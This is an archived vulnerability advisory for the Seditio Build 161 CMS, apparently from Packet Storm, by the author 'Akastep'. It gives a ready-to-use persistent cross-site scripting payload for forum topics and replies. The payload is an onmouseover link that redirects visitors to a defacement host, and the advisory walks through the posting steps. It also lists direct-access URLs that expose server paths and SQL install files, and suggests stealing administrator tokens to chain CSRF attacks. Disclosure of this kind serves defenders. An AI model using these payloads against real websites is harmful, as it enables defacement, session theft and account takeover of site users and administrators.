what you don't know can hurt you

Seditio Build 161 Cross Site Scripting / Information Disclosure

Seditio Build 161 Cross Site Scripting / Information Disclosure
Posted Mar 29, 2012
Authored by Akastep

Seditio Build 161 suffers from cross site scripting and information disclosure vulnerabilities.

tags | exploit, vulnerability, xss, info disclosure
MD5 | 692d136665369601d145b390f1679b9f

Seditio Build 161 Cross Site Scripting / Information Disclosure

Change Mirror Download
==========================================================
Vulnerable Software: seditio-build161
==========================================================
Downloaded from:http://neocrome.net/page.php?id=2447&a=dl

# md5sum sed*.rar
aad96010a15f0c38e5cc321f8a91dd1b *seditio-build161.rar

Installation:Standart (i assume with default settings)

Tested:
==========================================================
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
==========================================================
Vuln Desc: PERSISTENT CROSS SITE SCRIPTING:
==========================================================
Exploitation:
Create new topic(/forums.php?m=newtopic&s=1)
using the following details:

Topic Title: Whatever you want.
Topic Description: Whatever you want.
Body:
Inject this:
<a href="#" onmouseover="alert('You have Been Pwned) Meh Meh');window.top.location.href='http://defaced.tld/herewego.html'">You do not need click here!I will click it for you) Of course I ll pwn you)))</a>

Post the topic.

Then you'll see it as plaintext for first time.
Click the *EDIT* button but do not touch anything after this and simply Push the *UPDATE* button.
After update you'll return to your post.Try to over your mouse over the link.

Same rules and exploitation also applies to *Reply* section.
Remember you do not need touch anything after *edit* button you need only UPDATE the topic with your "payload" and thats all.
@Print screen on success pwn:
http://s43.radikal.ru/i099/1203/5d/2e2dfa119083.png

Other attacks also possible using XSS to steal security tokens and exploitate CSRF (change password or deface site automatically) using
document.body.innerHTML(to steal administrator tokens)
==========================================================
Ok now about Info And Path Disclosure:
Try to Direct access:(Also previous versions too suffers from Info and Path disclosure)

http://192.168.0.15/learn/9/seditio/view.php

Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21
@http://www.neocrome.net/view.php

http://192.168.0.15/learn/9/seditio/plugins/contact/lang/contact.en.lang.php

Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\plugins\contact\lang\contact.en.lang.php on line 37


http://192.168.0.15/learn/9/seditio/system/lang/en/main.lang.php
Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\main.lang.php on line 450


http://192.168.0.15/learn/9/seditio/system/lang/en/message.lang.php


Notice: Undefined variable: usr in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 37

Notice: Undefined variable: num in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 104
==============================================================================================================================
http://192.168.0.15/learn/9/seditio/system/core/view/view.inc.php
Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21

@http://www.neocrome.net/system/core/view/view.inc.php

===============================================================================================================================
Info disclosure:
http://192.168.0.15/learn/9/seditio/docs/new/seditio-createnew-160.sql
http://192.168.0.15/learn/9/seditio/docs/upgrade/sedito_convert_to_utf8.optional.sql

http://192.168.0.15/learn/9/seditio/system/install/install.parser.sql
IMO Needs at least simply .htaccess rule to protect from eyes this files.
===============================================================================================================================

/AkaStep ^_^
1332959725
















Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    8 Files
  • 2
    Jan 2nd
    11 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    2 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    18 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    10 Files
  • 10
    Jan 10th
    13 Files
  • 11
    Jan 11th
    2 Files
  • 12
    Jan 12th
    4 Files
  • 13
    Jan 13th
    21 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    12 Files
  • 16
    Jan 16th
    18 Files
  • 17
    Jan 17th
    11 Files
  • 18
    Jan 18th
    3 Files
  • 19
    Jan 19th
    2 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    21 Files
  • 22
    Jan 22nd
    19 Files
  • 23
    Jan 23rd
    19 Files
  • 24
    Jan 24th
    11 Files
  • 25
    Jan 25th
    1 Files
  • 26
    Jan 26th
    1 Files
  • 27
    Jan 27th
    19 Files
  • 28
    Jan 28th
    9 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close